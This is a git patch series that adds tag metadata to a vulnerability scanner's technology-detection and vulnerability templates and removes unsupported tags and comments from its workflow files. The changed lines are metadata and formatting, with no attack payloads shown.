dwisiswant0 severity: info + tags: tech,artica,proxy requests: - method: GET path: - "{{BaseURL}}/fw.login.php" + matchers-condition: and matchers: - type: word words: - "Welcome to the Artica Web Administration Interface" + - type: status status: - 200 \ No newline at end of file diff --git a/technologies/basic-auth-detection.yaml b/technologies/basic-auth-detection.yaml index 66132d212e..894c3892d0 100644 --- a/technologies/basic-auth-detection.yaml +++ b/technologies/basic-auth-detection.yaml @@ -4,6 +4,7 @@ info: name: Basic auth detection author: w4cky_ severity: info + tags: tech,basic-auth requests: - method: GET diff --git a/technologies/bigip-config-utility-detect.yaml b/technologies/bigip-config-utility-detect.yaml index 4d3c250775..78b2741369 100644 --- a/technologies/bigip-config-utility-detect.yaml +++ b/technologies/bigip-config-utility-detect.yaml @@ -4,6 +4,7 @@ info: name: BIG-IP Configuration Utility detected author: dwisiswant0 severity: info + tags: tech,bigip requests: - method: GET diff --git a/technologies/burp-api-detect.yaml b/technologies/burp-api-detect.yaml index 68a7000ee7..10cc8bcac8 100644 --- a/technologies/burp-api-detect.yaml +++ b/technologies/burp-api-detect.yaml @@ -5,6 +5,7 @@ info: author: joanbono severity: info reference: https://portswigger.net/burp/documentation/enterprise/api-reference + tags: burp,tech requests: - method: GET diff --git a/technologies/cacti-detect.yaml b/technologies/cacti-detect.yaml index 0a2a721928..9d1d018f12 100644 --- a/technologies/cacti-detect.yaml +++ b/technologies/cacti-detect.yaml @@ -4,6 +4,7 @@ info: author: geeknik description: Cacti is a complete network graphing solution -- https://www.cacti.net/ severity: info + tags: tech,cacti requests: - method: GET diff --git a/technologies/clockwork-php-page.yaml b/technologies/clockwork-php-page.yaml index 89ef10ba1b..a8537a2f36 100644 --- a/technologies/clockwork-php-page.yaml +++ b/technologies/clockwork-php-page.yaml @@ -1,9 +1,11 @@ id: clockwork-php-page + info: name: Clockwork PHP page exposure author: organiccrap severity: high reference: https://twitter.com/damian_89_/status/1250721398747791360 + tags: tech,clockwork requests: - method: GET diff --git a/technologies/cockpit-detect.yaml b/technologies/cockpit-detect.yaml index 30bf745acc..81dd323dc8 100644 --- a/technologies/cockpit-detect.yaml +++ b/technologies/cockpit-detect.yaml @@ -4,6 +4,7 @@ info: name: Detect Agentejo Cockpit author: dwisiswant0 severity: info + tags: tech,cockpit requests: - method: GET diff --git a/technologies/dell/dell-idrac6-detect.yaml b/technologies/dell/dell-idrac6-detect.yaml index 9d8bb598ff..6f3c118b88 100644 --- a/technologies/dell/dell-idrac6-detect.yaml +++ b/technologies/dell/dell-idrac6-detect.yaml @@ -1,9 +1,11 @@ id: dell-idrac6-detect + info: name: Detect Dell iDRAC6 author: kophjager007 description: The Integrated Dell Remote Access Controller (iDRAC) is designed for secure local and remote server management and helps IT administrators deploy, update and monitor Dell EMC PowerEdge servers. severity: info + tags: tech,dell requests: - method: GET diff --git a/technologies/dell/dell-idrac7-detect.yaml b/technologies/dell/dell-idrac7-detect.yaml index bddc00552b..220cfc4503 100644 --- a/technologies/dell/dell-idrac7-detect.yaml +++ b/technologies/dell/dell-idrac7-detect.yaml @@ -1,9 +1,11 @@ id: dell-idrac7-detect + info: name: Detect Dell iDRAC7 author: kophjager007 description: The Integrated Dell Remote Access Controller (iDRAC) is designed for secure local and remote server management and helps IT administrators deploy, update and monitor Dell EMC PowerEdge servers. severity: info + tags: tech,dell requests: - method: GET diff --git a/technologies/dell/dell-idrac8-detect.yaml b/technologies/dell/dell-idrac8-detect.yaml index e25dc371e6..2fd72b97aa 100644 --- a/technologies/dell/dell-idrac8-detect.yaml +++ b/technologies/dell/dell-idrac8-detect.yaml @@ -1,9 +1,11 @@ id: dell-idrac8-detect + info: name: Detect Dell iDRAC8 author: kophjager007 description: The Integrated Dell Remote Access Controller (iDRAC) is designed for secure local and remote server management and helps IT administrators deploy, update and monitor Dell EMC PowerEdge servers. severity: info + tags: tech,dell requests: - method: GET diff --git a/technologies/dell/dell-idrac9-detect.yaml b/technologies/dell/dell-idrac9-detect.yaml index 7677292de5..f339b04905 100644 --- a/technologies/dell/dell-idrac9-detect.yaml +++ b/technologies/dell/dell-idrac9-detect.yaml @@ -1,9 +1,11 @@ id: dell-idrac9-detect + info: name: Detect Dell iDRAC9 author: kophjager007 description: The Integrated Dell Remote Access Controller (iDRAC) is designed for secure local and remote server management and helps IT administrators deploy, update and monitor Dell EMC PowerEdge servers. severity: info + tags: tech,dell requests: - method: GET diff --git a/technologies/favicon-detection.yaml b/technologies/favicon-detection.yaml index 7394c9fff3..3cf1e620d8 100644 --- a/technologies/favicon-detection.yaml +++ b/technologies/favicon-detection.yaml @@ -10,6 +10,7 @@ info: - https://medium.com/@Asm0d3us/weaponizing-favicon-ico-for-bugbounties-osint-and-what-not-ace3c214e139 - https://github.com/devanshbatham/FavFreak - https://github.com/sansatart/scrapts/blob/master/shodan-favicon-hashes.csv + tags: tech,favicon requests: - method: GET diff --git a/technologies/firebase-detect.yaml b/technologies/firebase-detect.yaml index fe3ff98b30..5c22ef8819 100644 --- a/technologies/firebase-detect.yaml +++ b/technologies/firebase-detect.yaml @@ -5,11 +5,13 @@ info: author: organiccrap severity: low reference: http://ghostlulz.com/google-exposed-firebase-database/ + tags: tech,firebase requests: - method: GET path: - "{{BaseURL}}/.settings/rules.json?auth=FIREBASE_SECRET" + matchers: - type: word words: diff --git a/technologies/google-storage.yaml b/technologies/google-storage.yaml index 27f4814a5b..95963c6a8c 100644 --- a/technologies/google-storage.yaml +++ b/technologies/google-storage.yaml @@ -4,6 +4,7 @@ info: name: Google Bucket detection author: 0xTeles severity: info + tags: tech,gstorage,google,bucket requests: - method: GET diff --git a/technologies/graphql-detect.yaml b/technologies/graphql-detect.yaml index ef649b7d06..53d67b1326 100644 --- a/technologies/graphql-detect.yaml +++ b/technologies/graphql-detect.yaml @@ -4,6 +4,7 @@ info: name: GraphQL API Detection author: NkxxkN,ELSFA7110 severity: info + tags: tech,graphql requests: - method: POST diff --git a/technologies/graylog-api-browser.yaml b/technologies/graylog-api-browser.yaml index 6c93a114fa..98799a87c0 100644 --- a/technologies/graylog-api-browser.yaml +++ b/technologies/graylog-api-browser.yaml @@ -4,6 +4,7 @@ info: name: Detect Graylog REST API author: PR3R00T severity: info + tags: tech,graylog requests: - method: GET diff --git a/technologies/gunicorn-detect.yaml b/technologies/gunicorn-detect.yaml index 69f286e77b..56f5080384 100644 --- a/technologies/gunicorn-detect.yaml +++ b/technologies/gunicorn-detect.yaml @@ -1,9 +1,11 @@ id: gunicorn-detect + info: name: Detect Gunicorn Server author: joanbono description: Gunicorn Python WSGI HTTP Server for UNIX - https://github.com/benoitc/gunicorn severity: info + tags: tech,gunicorn requests: - method: GET @@ -22,4 +24,4 @@ requests: - type: kval part: header kval: - - Server + - Server \ No newline at end of file diff --git a/technologies/harbor-detect.yaml b/technologies/harbor-detect.yaml index e082b48acf..1ede65a8df 100644 --- a/technologies/harbor-detect.yaml +++ b/technologies/harbor-detect.yaml @@ -1,8 +1,10 @@ id: harbor-detect + info: name: Harbor Detect author: pikpikcu severity: info + tags: tech,harbor requests: - method: GET diff --git a/technologies/home-assistant.yaml b/technologies/home-assistant.yaml index 0522fc067b..dfb82e44b7 100644 --- a/technologies/home-assistant.yaml +++ b/technologies/home-assistant.yaml @@ -4,6 +4,7 @@ info: name: Detect Home Assistant author: fabaff severity: info + tags: tech,iot requests: - method: GET diff --git a/technologies/ilo-detect.yaml b/technologies/ilo-detect.yaml index 70f0fc1e8d..6eeff924eb 100644 --- a/technologies/ilo-detect.yaml +++ b/technologies/ilo-detect.yaml @@ -5,6 +5,7 @@ info: author: milo2012 severity: info description: Version of HP iLO + tags: tech,ilo requests: - method: GET diff --git a/technologies/jaspersoft-detect.yaml b/technologies/jaspersoft-detect.yaml index 7cafc9a84d..e26ad12b3f 100644 --- a/technologies/jaspersoft-detect.yaml +++ b/technologies/jaspersoft-detect.yaml @@ -4,6 +4,7 @@ info: name: Jaspersoft detected author: koti2 severity: info + tags: tech,jaspersoft requests: - method: GET diff --git a/technologies/jellyfin-detect.yaml b/technologies/jellyfin-detect.yaml index ae031c20ca..9b31eaed43 100644 --- a/technologies/jellyfin-detect.yaml +++ b/technologies/jellyfin-detect.yaml @@ -4,6 +4,7 @@ info: name: Jellyfin detected author: dwisiswant0 severity: info + tags: tech,jellyfin requests: - method: GET @@ -13,6 +14,8 @@ requests: - "{{BaseURL}}/index.html" - "{{BaseURL}}/web/index.html" - "{{BaseURL}}/web/manifest.json" + + stop-at-first-match: true matchers-condition: and matchers: - type: word @@ -22,6 +25,7 @@ requests: - "The Free Software Media System" condition: or part: body + - type: status status: - 200 diff --git a/technologies/jolokia.yaml b/technologies/jolokia.yaml index f6b28ff6ad..957b898273 100644 --- a/technologies/jolokia.yaml +++ b/technologies/jolokia.yaml @@ -4,11 +4,13 @@ info: name: Jolokia Version Disclosure author: mavericknerd,dwisiswant0 severity: info + tags: tech,jolokia requests: - method: GET path: - '{{BaseURL}}/jolokia/version' + matchers-condition: and matchers: - type: word @@ -17,6 +19,7 @@ requests: - '"protocol":' - '"agent":' condition: and + - type: status status: - 200 diff --git a/technologies/kibana-detect.yaml b/technologies/kibana-detect.yaml index c35b4dd301..c64939b6df 100644 --- a/technologies/kibana-detect.yaml +++ b/technologies/kibana-detect.yaml @@ -4,6 +4,7 @@ info: name: Kibana Service Detection author: petruknisme severity: info + tags: tech,kibana requests: - method: GET diff --git a/technologies/kong-detect.yaml b/technologies/kong-detect.yaml index 6164d7c1cd..39e4d58bb7 100644 --- a/technologies/kong-detect.yaml +++ b/technologies/kong-detect.yaml @@ -4,6 +4,7 @@ info: author: geeknik description: The Cloud-Native API Gateway - https://github.com/Kong/kong severity: info + tags: tech,kong requests: - method: GET diff --git a/technologies/liferay-portal-detect.yaml b/technologies/liferay-portal-detect.yaml index ebf42ab88b..2a8de63c94 100644 --- a/technologies/liferay-portal-detect.yaml +++ b/technologies/liferay-portal-detect.yaml @@ -1,9 +1,11 @@ id: liferay-portal-detect + info: name: Liferay Portal Detection author: organiccrap,dwisiswant0 severity: info reference: https://github.com/mzer0one/CVE-2020-7961-POC # CVE-2020-7961: Liferay Portal Unauthenticated RCE + tags: tech,liferay requests: - method: GET diff --git a/technologies/linkerd-badrule-detect.yaml b/technologies/linkerd-badrule-detect.yaml index 5e445af239..0e1ef8ff57 100644 --- a/technologies/linkerd-badrule-detect.yaml +++ b/technologies/linkerd-badrule-detect.yaml @@ -1,15 +1,11 @@ id: linkerd-badrule-detect -# Detect the Linkerd service by overriding the delegation table with an invalid -# rule, the presence of the service is indicated by either: -# - a "Via: .. linkerd .." -# - a "l5d-err" and/or a "l5d-success" header -# - a literal error in the body - info: name: Linkerd detection via bad rule author: dudez severity: info + tags: tech,linkerd + reference: https://linkerd.io requests: - method: GET diff --git a/technologies/lotus-domino-version.yaml b/technologies/lotus-domino-version.yaml index 3af4529ee9..897d6fad2e 100644 --- a/technologies/lotus-domino-version.yaml +++ b/technologies/lotus-domino-version.yaml @@ -1,8 +1,10 @@ id: lotus-domino-version + info: name: Lotus Domino Version Extractor author: CasperGN severity: info + tags: tech,lotus requests: - method: GET path: diff --git a/technologies/metabase-detect.yaml b/technologies/metabase-detect.yaml index 2b8c4cec7d..3a865ab0e7 100644 --- a/technologies/metabase-detect.yaml +++ b/technologies/metabase-detect.yaml @@ -1,13 +1,17 @@ id: metabase-version-detect + info: name: Detect Metabase Version author: revblock description: If a Metabase instance is deployed on the target URL it will return a login page with the version number in the page source severity: info + tags: tech,metabase + requests: - method: GET path: - "{{BaseURL}}/auth/login" + matchers-condition: and matchers: diff --git a/technologies/mrtg-detect.yaml b/technologies/mrtg-detect.yaml index 19a062f6fa..96f95f15d6 100644 --- a/technologies/mrtg-detect.yaml +++ b/technologies/mrtg-detect.yaml @@ -1,9 +1,11 @@ id: mrtg-detect + info: name: Detect MRTG author: geeknik description: The Multi Router Traffic Grapher -- https://oss.oetiker.ch/mrtg/ severity: info + tags: tech,mrtg requests: - method: GET diff --git a/technologies/netsweeper-webadmin-detect.yaml b/technologies/netsweeper-webadmin-detect.yaml index cc107c6ddc..04b545b315 100644 --- a/technologies/netsweeper-webadmin-detect.yaml +++ b/technologies/netsweeper-webadmin-detect.yaml @@ -4,6 +4,7 @@ info: name: Netsweeper WebAdmin detected author: dwisiswant0 severity: info + tags: tech,netsweeper requests: - method: GET diff --git a/technologies/nginx-version.yaml b/technologies/nginx-version.yaml index 9674f616ed..302d5d3d19 100644 --- a/technologies/nginx-version.yaml +++ b/technologies/nginx-version.yaml @@ -1,9 +1,12 @@ id: nginx-version + info: name: nginx version detect author: philippedelteil description: Some nginx servers have the version on the response header. Useful when you need to find specific CVEs on your targets. severity: info + tags: tech,nginx + requests: - method: GET path: diff --git a/technologies/nifi-detech.yaml b/technologies/nifi-detech.yaml index 8e593cc440..837e4c43fd 100644 --- a/technologies/nifi-detech.yaml +++ b/technologies/nifi-detech.yaml @@ -4,6 +4,7 @@ info: name: Apache NiFi detect author: dwisiswant0 severity: info + tags: tech,apache,nifi requests: - method: GET @@ -15,6 +16,7 @@ requests: - "{{BaseURL}}/flow/registries" - "{{BaseURL}}/system-diagnostics" - "{{BaseURL}}/nifi-api/access/config" + matchers-condition: and matchers: - type: regex @@ -22,6 +24,7 @@ requests: - "supportsLogin" - "disconnectedNodeAcknowledged" - "(aggregate|node)Snapshots?" + - type: status status: - 200 diff --git a/technologies/oidc-detect.yaml b/technologies/oidc-detect.yaml index d8f65083d7..f87bf320d2 100644 --- a/technologies/oidc-detect.yaml +++ b/technologies/oidc-detect.yaml @@ -1,9 +1,11 @@ id: oidc-detect + info: name: Detect OpenID Connect provider author: jarijaas severity: info description: Detects OpenID Connect providers. See https://en.wikipedia.org/wiki/OpenID_Connect + tags: tech,oidc requests: - method: GET diff --git a/technologies/openam-detection.yaml b/technologies/openam-detection.yaml index b3c603dde0..fd1653f20f 100644 --- a/technologies/openam-detection.yaml +++ b/technologies/openam-detection.yaml @@ -4,6 +4,7 @@ info: name: Detect OpenAM and OpenSSO author: philippedelteil severity: info + tags: tech,openam requests: - method: GET diff --git a/technologies/pi-hole-detect.yaml b/technologies/pi-hole-detect.yaml index 0f5cbcb052..22d1a56dca 100644 --- a/technologies/pi-hole-detect.yaml +++ b/technologies/pi-hole-detect.yaml @@ -1,8 +1,10 @@ id: pi-hole-detect + info: name: pi-hole detector author: geeknik severity: info + tags: tech,pihole requests: - method: GET @@ -14,6 +16,7 @@ requests: - type: status status: - 200 + - type: word words: - "Pi-hole" diff --git a/technologies/prtg-detect.yaml b/technologies/prtg-detect.yaml index c57d90484d..c630eff289 100644 --- a/technologies/prtg-detect.yaml +++ b/technologies/prtg-detect.yaml @@ -1,9 +1,11 @@ id: prtg-detect + info: name: Detect PRTG author: geeknik description: Monitor all the systems, devices, traffic, and applications in your IT infrastructure -- https://www.paessler.com/prtg severity: info + tags: tech,prtg requests: - method: GET diff --git a/technologies/redmine-cli-detect.yaml b/technologies/redmine-cli-detect.yaml index 24a02349aa..8cb08b7888 100644 --- a/technologies/redmine-cli-detect.yaml +++ b/technologies/redmine-cli-detect.yaml @@ -4,6 +4,7 @@ info: author: geeknik description: A small command-line utility to interact with Redmine - https://pypi.org/project/Redmine-CLI/ severity: info + tags: tech,redmine requests: - method: GET diff --git a/technologies/s3-detect.yaml b/technologies/s3-detect.yaml index fe617373af..3ed37bb68e 100644 --- a/technologies/s3-detect.yaml +++ b/technologies/s3-detect.yaml @@ -4,6 +4,7 @@ info: name: Detect Amazon-S3 Bucket author: melbadry9 severity: info + tags: aws,s3,bucket,tech requests: - method: GET diff --git a/technologies/shiro-detect.yaml b/technologies/shiro-detect.yaml index 321f556a03..8353c48494 100644 --- a/technologies/shiro-detect.yaml +++ b/technologies/shiro-detect.yaml @@ -1,16 +1,20 @@ id: shiro-detect + info: name: Detect Shiro Framework author: AresX severity: info + tags: tech,shiro + requests: - method: GET path: - '{{BaseURL}}' headers: Cookie: rememberMe=123; + matchers: - type: word words: - - rememberMe=deleteMe + - 'rememberMe=deleteMe' part: header \ No newline at end of file diff --git a/technologies/springboot-actuator.yaml b/technologies/springboot-actuator.yaml index 6bc4c9e7a1..ebc7edbe1e 100644 --- a/technologies/springboot-actuator.yaml +++ b/technologies/springboot-actuator.yaml @@ -4,13 +4,17 @@ info: name: Detect Springboot Actuators author: that_juan_,dwisiswant0,wdahlenb severity: info + tags: tech,springboot,actuator requests: - method: GET path: + - "{{BaseURL}}" - "{{BaseURL}}/actuator" - "{{BaseURL}}/favicon.ico" + - "{{BaseURL}}/actuator/favicon.ico" + stop-at-first-match: true matchers-condition: or matchers: - type: word diff --git a/technologies/sql-server-reporting.yaml b/technologies/sql-server-reporting.yaml index 5b08ec1032..4b64c61e6f 100644 --- a/technologies/sql-server-reporting.yaml +++ b/technologies/sql-server-reporting.yaml @@ -4,6 +4,7 @@ info: name: Detect Microsoft SQL Server Reporting author: puzzlepeaches severity: info + tags: tech,micrsoft requests: - method: GET diff --git a/technologies/telerik-fileupload-detect.yaml b/technologies/telerik-fileupload-detect.yaml index 810cef7a8b..8f150d8b40 100644 --- a/technologies/telerik-fileupload-detect.yaml +++ b/technologies/telerik-fileupload-detect.yaml @@ -4,11 +4,13 @@ info: name: Detect Telerik Web UI fileupload handler author: organiccrap severity: info + tags: tech,telerik requests: - method: GET path: - "{{BaseURL}}/Telerik.Web.UI.WebResource.axd?type=rau" + matchers: - type: word words: diff --git a/technologies/terraform-detect.yaml b/technologies/terraform-detect.yaml index 8c4d3307df..4a458c77e2 100644 --- a/technologies/terraform-detect.yaml +++ b/technologies/terraform-detect.yaml @@ -1,9 +1,11 @@ id: terraform-detect + info: name: Detect Terraform Provider author: geeknik description: Write Infrastructure as Code - https://www.terraform.io/ severity: info + tags: tech,terraform requests: - method: GET diff --git a/technologies/tomcat-detect.yaml b/technologies/tomcat-detect.yaml index d5a164932d..5561dba63d 100644 --- a/technologies/tomcat-detect.yaml +++ b/technologies/tomcat-detect.yaml @@ -1,10 +1,12 @@ -id: tomcat-version-detect +id: tomcat-version + info: name: Detect Tomcat Version author: philippedelteil - description: If an Tomcat instance is deployed on the target URL, when we send a request for - a non existent resource we receive a Tomcat error page with version. + description: If an Tomcat instance is deployed on the target URL, when we send a request for a non existent resource we receive a Tomcat error page with version. severity: info + tags: tech,tomcat,apache + requests: - method: GET path: diff --git a/technologies/tor-socks-proxy.yaml b/technologies/tor-socks-proxy.yaml index ddbe880309..4957f092b8 100644 --- a/technologies/tor-socks-proxy.yaml +++ b/technologies/tor-socks-proxy.yaml @@ -1,8 +1,10 @@ id: tor-socks-proxy + info: name: Detect tor SOCKS proxy author: geeknik severity: info + tags: tech,tor,proxy requests: - method: GET diff --git a/technologies/weblogic-detect.yaml b/technologies/weblogic-detect.yaml index 6d290ac6f8..4effb62c55 100644 --- a/technologies/weblogic-detect.yaml +++ b/technologies/weblogic-detect.yaml @@ -4,6 +4,7 @@ info: name: Detect Weblogic author: bing0o severity: info + tags: tech,weblogic requests: - method: GET diff --git a/technologies/werkzeug-debugger-detect.yaml b/technologies/werkzeug-debugger-detect.yaml index f11eac5435..aa90f4c1a3 100644 --- a/technologies/werkzeug-debugger-detect.yaml +++ b/technologies/werkzeug-debugger-detect.yaml @@ -4,6 +4,7 @@ info: name: Werkzeug debugger console author: pdteam severity: info + tags: tech,werkzeug requests: - method: GET diff --git a/vulnerabilities/lsoft/listserv_maestro_rce.yaml b/vulnerabilities/lsoft/listserv_maestro_rce.yaml index 3f04c30a27..56b6d5f00f 100644 --- a/vulnerabilities/lsoft/listserv_maestro_rce.yaml +++ b/vulnerabilities/lsoft/listserv_maestro_rce.yaml @@ -8,6 +8,7 @@ info: reference: - https://www.securifera.com/advisories/sec-2020-0001/ - https://packetstormsecurity.com/files/159643/listservmaestro-exec.txt + tags: rce,listserv,ognl requests: - method: GET diff --git a/vulnerabilities/other/cacti-weathermap-file-write.yaml b/vulnerabilities/other/cacti-weathermap-file-write.yaml index b8ebf42adb..04a5d1b654 100644 --- a/vulnerabilities/other/cacti-weathermap-file-write.yaml +++ b/vulnerabilities/other/cacti-weathermap-file-write.yaml @@ -5,6 +5,7 @@ info: author: pikpikcu severity: medium reference: https://www.freebuf.com/articles/system/125177.html + tags: injection,cacti requests: - method: GET diff --git a/vulnerabilities/other/caucho-resin-info-disclosure.yaml b/vulnerabilities/other/caucho-resin-info-disclosure.yaml index f4fa330ad9..04795427db 100644 --- a/vulnerabilities/other/caucho-resin-info-disclosure.yaml +++ b/vulnerabilities/other/caucho-resin-info-disclosure.yaml @@ -5,6 +5,7 @@ info: author: pikpikcu severity: info reference: https://www.exploit-db.com/exploits/27888 + tags: exposure,resin requests: - method: GET diff --git a/vulnerabilities/other/pmb-local-file-disclosure.yaml b/vulnerabilities/other/pmb-local-file-disclosure.yaml index 062d1759ab..a62783f871 100644 --- a/vulnerabilities/other/pmb-local-file-disclosure.yaml +++ b/vulnerabilities/other/pmb-local-file-disclosure.yaml @@ -5,6 +5,7 @@ info: author: dhiyaneshDk severity: high reference: https://www.exploit-db.com/exploits/49054 + tags: lfi,pmb requests: - method: GET diff --git a/vulnerabilities/other/vpms-auth-bypass.yaml b/vulnerabilities/other/vpms-auth-bypass.yaml index d0dcd358f6..6f612b4f78 100644 --- a/vulnerabilities/other/vpms-auth-bypass.yaml +++ b/vulnerabilities/other/vpms-auth-bypass.yaml @@ -5,7 +5,7 @@ info: author: dwisiswant0 severity: high reference: https://www.exploit-db.com/exploits/48877 - + tags: auth-bypass requests: - raw: - | diff --git a/vulnerabilities/other/zms-auth-bypass.yaml b/vulnerabilities/other/zms-auth-bypass.yaml index fbc1e03821..65c7df9984 100644 --- a/vulnerabilities/other/zms-auth-bypass.yaml +++ b/vulnerabilities/other/zms-auth-bypass.yaml @@ -5,6 +5,7 @@ info: author: dwisiswant0 severity: high reference: https://www.exploit-db.com/exploits/48880 + tags: auth-bypass,zms requests: - raw: From 8b36cf0f863818fb553ca7f2372dea63368d3da5 Mon Sep 17 00:00:00 2001 From: sandeep Date: Thu, 9 Sep 2021 19:14:14 +0530 Subject: [PATCH 123/339] workflow tags cleanup as it's not supported at workflow level --- workflows/aem-workflow.yaml | 1 - workflows/airflow-workflow.yaml | 1 - workflows/artica-web-proxy-workflow.yaml | 6 ------ workflows/azkaban-workflow.yaml | 2 -- workflows/bigip-workflow.yaml | 6 ------ workflows/cacti-workflow.yaml | 2 -- workflows/cisco-asa-workflow.yaml | 6 ------ workflows/cockpit-workflow.yaml | 1 - workflows/dell-idrac-workflow.yaml | 1 - workflows/gitlab-workflow.yaml | 2 -- workflows/grafana-workflow.yaml | 2 -- workflows/harbor-workflow.yaml | 2 -- workflows/jellyfin-workflow.yaml | 1 - workflows/jira-workflow.yaml | 2 -- workflows/liferay-workflow.yaml | 5 ----- workflows/lotus-domino-workflow.yaml | 5 ----- workflows/lucee-workflow.yaml | 1 - workflows/magento-workflow.yaml | 1 - workflows/magmi-workflow.yaml | 6 ------ workflows/mida-eframework-workflow.yaml | 5 ----- workflows/netsweeper-workflow.yaml | 6 ------ workflows/phpmyadmin-workflow.yaml | 1 - workflows/rabbitmq-workflow.yaml | 5 ----- workflows/sap-netweaver-workflow.yaml | 1 - workflows/solarwinds-orion-workflow.yaml | 4 ---- workflows/springboot-workflow.yaml | 5 ----- workflows/thinkcmf-workflow.yaml | 2 -- workflows/thinkphp-workflow.yaml | 2 -- workflows/vbulletin-workflow.yaml | 6 ------ workflows/weblogic-workflow.yaml | 2 -- workflows/wordpress-workflow.yaml | 1 - 31 files changed, 93 deletions(-) diff --git a/workflows/aem-workflow.yaml b/workflows/aem-workflow.yaml index ff8f7019c7..6ef96d04c9 100644 --- a/workflows/aem-workflow.yaml +++ b/workflows/aem-workflow.yaml @@ -4,7 +4,6 @@ info: name: Adobe Experience Manager Security Checks author: dhiyaneshDK description: A simple workflow that runs all Adobe Experience Manager related nuclei templates on a given target. - tags: workflow workflows: - template: technologies/aem-detection.yaml diff --git a/workflows/airflow-workflow.yaml b/workflows/airflow-workflow.yaml index 8a5a9164e8..1408a62b69 100644 --- a/workflows/airflow-workflow.yaml +++ b/workflows/airflow-workflow.yaml @@ -4,7 +4,6 @@ info: name: Apache Airflow Security Checks author: pdteam description: A simple workflow that runs all Apache Airflow related nuclei templates on a given target. - tags: workflow workflows: diff --git a/workflows/artica-web-proxy-workflow.yaml b/workflows/artica-web-proxy-workflow.yaml index 8fee7fe758..ed4ba17f87 100644 --- a/workflows/artica-web-proxy-workflow.yaml +++ b/workflows/artica-web-proxy-workflow.yaml @@ -4,14 +4,8 @@ info: name: Artica Web Proxy Security Checks author: dwisiswant0,pdteam description: A simple workflow that runs all Artica Web Proxy related nuclei templates on a given target. - tags: workflow - - # Supported on Nuclei v2.2.0 (https://github.com/projectdiscovery/nuclei/releases/tag/v2.2.0) - # Old workflows still remains valid, and will be working with all nuclei versions. workflows: - - template: technologies/artica-web-proxy-detect.yaml - subtemplates: - template: cves/2020/CVE-2020-17505.yaml \ No newline at end of file diff --git a/workflows/azkaban-workflow.yaml b/workflows/azkaban-workflow.yaml index 944c6b04b2..0fb56f4451 100644 --- a/workflows/azkaban-workflow.yaml +++ b/workflows/azkaban-workflow.yaml @@ -4,10 +4,8 @@ info: name: Azkaban Security Checks author: pdteam description: A simple workflow that runs all Azkaban related nuclei templates on a given target. - tags: workflow workflows: - - template: exposed-panels/azkaban-web-client.yaml subtemplates: - template: default-logins/azkaban/azkaban-web-client-default-creds.yaml diff --git a/workflows/bigip-workflow.yaml b/workflows/bigip-workflow.yaml index 315999a816..2e3b152ede 100644 --- a/workflows/bigip-workflow.yaml +++ b/workflows/bigip-workflow.yaml @@ -4,14 +4,8 @@ info: name: F5 BIG-IP Security Checks author: dwisiswant0 description: A simple workflow that runs all BigIP related nuclei templates on a given target. - tags: workflow - - # Supported on Nuclei v2.2.0 (https://github.com/projectdiscovery/nuclei/releases/tag/v2.2.0) - # Old workflows still remains valid, and will be working with all nuclei versions. workflows: - - template: technologies/bigip-config-utility-detect.yaml - subtemplates: - template: cves/2020/CVE-2020-5902.yaml diff --git a/workflows/cacti-workflow.yaml b/workflows/cacti-workflow.yaml index 8e2a673caf..7810865c26 100644 --- a/workflows/cacti-workflow.yaml +++ b/workflows/cacti-workflow.yaml @@ -6,8 +6,6 @@ info: description: A simple workflow that runs all Cacti related nuclei templates on a given target. workflows: - - template: technologies/cacti-detect.yaml - subtemplates: - template: vulnerabilities/other/cacti-weathermap-file-write.yaml \ No newline at end of file diff --git a/workflows/cisco-asa-workflow.yaml b/workflows/cisco-asa-workflow.yaml index 455eb68e1c..4c864a33d5 100644 --- a/workflows/cisco-asa-workflow.yaml +++ b/workflows/cisco-asa-workflow.yaml @@ -4,15 +4,9 @@ info: name: Cisco ASA Security Checks author: flag007 description: A simple workflow that runs all Cisco related nuclei templates on a given target. - tags: workflow - - # Supported on Nuclei v2.2.0 (https://github.com/projectdiscovery/nuclei/releases/tag/v2.2.0) - # Old workflows still remains valid, and will be working with all nuclei versions. workflows: - - template: exposed-panels/cisco-asa-panel.yaml - subtemplates: - template: cves/2020/CVE-2020-3187.yaml - template: cves/2020/CVE-2020-3452.yaml diff --git a/workflows/cockpit-workflow.yaml b/workflows/cockpit-workflow.yaml index 1771944bf3..8e3bdc14c2 100644 --- a/workflows/cockpit-workflow.yaml +++ b/workflows/cockpit-workflow.yaml @@ -4,7 +4,6 @@ info: name: Agentejo Cockpit Security Checks author: dwisiswant0 description: A simple workflow that runs all Agentejo Cockpit related nuclei templates on a given target. - tags: workflow workflows: - template: technologies/cockpit-detect.yaml diff --git a/workflows/dell-idrac-workflow.yaml b/workflows/dell-idrac-workflow.yaml index e7385e0602..bdf4e83b20 100644 --- a/workflows/dell-idrac-workflow.yaml +++ b/workflows/dell-idrac-workflow.yaml @@ -3,7 +3,6 @@ info: name: Dell iDRAC Security Checks author: kophjager007 description: A workflow to identify Dell iDRAC instances and run all related nuclei templates. - tags: workflow workflows: - template: technologies/dell/dell-idrac6-detect.yaml diff --git a/workflows/gitlab-workflow.yaml b/workflows/gitlab-workflow.yaml index c05d54cad2..ef6b650224 100644 --- a/workflows/gitlab-workflow.yaml +++ b/workflows/gitlab-workflow.yaml @@ -4,10 +4,8 @@ info: name: GitLab Security Checks author: pdteam description: A simple workflow that runs all GitLab related nuclei templates on a given target. - tags: workflow workflows: - - template: exposed-panels/gitlab-detect.yaml subtemplates: - tags: gitlab \ No newline at end of file diff --git a/workflows/grafana-workflow.yaml b/workflows/grafana-workflow.yaml index 6bff88bb5f..1a2240d48e 100644 --- a/workflows/grafana-workflow.yaml +++ b/workflows/grafana-workflow.yaml @@ -4,10 +4,8 @@ info: name: Grafana Security Checks author: pdteam description: A simple workflow that runs all Grafana related nuclei templates on a given target. - tags: workflow workflows: - template: exposed-panels/grafana-detect.yaml - subtemplates: - tags: grafana diff --git a/workflows/harbor-workflow.yaml b/workflows/harbor-workflow.yaml index d99c9482a2..49003135e7 100644 --- a/workflows/harbor-workflow.yaml +++ b/workflows/harbor-workflow.yaml @@ -4,10 +4,8 @@ info: name: Harbor Security Checks author: pikpikcu description: A simple workflow that runs all Harbor related nuclei templates on a given target. - tags: workflow workflows: - - template: technologies/harbor-detect.yaml subtemplates: - template: cves/2019/CVE-2019-16097.yaml \ No newline at end of file diff --git a/workflows/jellyfin-workflow.yaml b/workflows/jellyfin-workflow.yaml index 5023290961..126b6dbc0e 100644 --- a/workflows/jellyfin-workflow.yaml +++ b/workflows/jellyfin-workflow.yaml @@ -3,7 +3,6 @@ info: name: Jellyfin Security Checks author: dwisiswant0 description: A simple workflow that runs all Jellyfin related nuclei templates on a given target. - tags: workflow workflows: - template: 